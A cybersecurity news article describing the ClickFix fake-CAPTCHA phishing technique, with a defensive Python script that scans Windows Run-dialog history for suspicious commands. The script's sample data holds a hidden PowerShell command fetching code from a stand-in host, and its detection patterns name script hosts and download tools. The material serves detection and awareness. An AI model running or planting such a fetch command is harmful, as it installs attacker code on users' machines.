Валентин Шнайдер, Hot News
10 June 2025, 18:38
ClickFix forces users to run malware themselves under the guise of a security check
A new phishing attack called ClickFix uses a simple but effective social engineering technique. In order to trick victims into executing malicious commands on their devices, attackers disguise them as regular CAPTCHAs or «I’m not a robot» buttons.
The ClickFix phishing scam, analyzed by SlashNext experts, works by masquerading as well-known online security features, such as the Cloudflare Turnstile captcha. The analysis describes how users are shown a fake «human verification» page. It includes official logos and even a unique «Ray ID» to make it look as believable as possible.
After clicking on «Prove you are human,» the victim is prompted to perform a series of steps: open the Windows Run dialog (Win+R), paste the contents of the clipboard (Ctrl+V), and press Enter. In doing so, the user unknowingly runs a hidden PowerShell script that malicious JavaScript has already copied to the clipboard. This script typically downloads and runs second-stage malware, such as remote access trojans or data-stealing programs.
ClickFix avoids traditional file download methods because the user runs a system command, which helps bypass antivirus tools that primarily monitor new executables. The phishing page is often created as a single HTML file with locally embedded resources and obfuscated code to hide malicious operations.
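Because the command is pasted into the Run dialog, it leaves a trace that responders can check: Windows keeps Run-dialog history in the per-user RunMRU registry key. The following triage sketch is an added example, not taken from the SlashNext analysis; the sample `reg query` output is constructed, and the indicator patterns and function names are assumptions of this example.

```python
import re

# Constructed sample of `reg query` output for the per-user RunMRU key.
# Windows stores Run-dialog (Win+R) history there; each entry ends in "\1".
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    cmd\1
    MRUList    REG_SZ    cba
    b    REG_SZ    powershell -w hidden -c "irm https://example.invalid/v"\1
    c    REG_SZ    \\fileserver\share\reports\1
"""

# Heuristic indicators (assumptions of this example; tune per environment).
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+h[a-z]*\b", re.I),
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"https?://|\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|downloadstring)\b", re.I),
}
VALUE_LINE = re.compile(r"^\s+(\S+)\s+REG_SZ\s+(.*)$")


def parse_runmru(reg_output):
    """Return Run-dialog commands, most recent first, from `reg query` text."""
    values = {}
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = m.group(2).rstrip()
    # MRUList holds the value names in most-recent-first order.
    order = values.pop("MRUList", "".join(sorted(values)))
    return [values[k].removesuffix("\\1") for k in order if k in values]


def triage(commands):
    """Flag commands that start a script host and hit at least one more indicator."""
    findings = []
    for cmd in commands:
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if "script_host" in hits and len(hits) >= 2:
            findings.append((cmd, hits))
    return findings


if __name__ == "__main__":
    for cmd, hits in triage(parse_runmru(SAMPLE_REG_OUTPUT)):
        print(f"SUSPICIOUS {hits}: {cmd}")
```

A plain `cmd` or a UNC path in the history is not flagged; only a script host combined with a hidden window, an encoded command, or a remote fetch is reported.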
The secret to ClickFix’s success lies in exploiting human trust and the habit of quickly passing captchas and security checks. Many users simply trust a familiar interface, not suspecting that they are pasting dangerous code into the system. Even checking the URL may not help if the page is hosted on a similar domain or a hacked site.
Social engineering and phishing
ClickFix phishing demonstrates that modern cybersecurity threats increasingly focus on user deception rather than the complexity of technical vulnerabilities. Antivirus and browser developers should adapt to new social engineering techniques. At the same time, users should follow basic security rules, carefully check actions that require system commands, and train themselves to recognize the signs of fake interfaces.
This attack shows that cybercriminals do not always need sophisticated exploits, but can choose methods that manipulate user behavior. Therefore, it is important to remind people to be careful, never paste unfamiliar commands into system tools, and use modern solutions to protect their browser and network.
A somewhat similar social engineering method is being used by Russian hackers. A new attack on macOS users has been recorded by CloudSEK. The attackers are distributing AtomicOS (AMOS) malware that steals passwords, crypto wallets, and system data.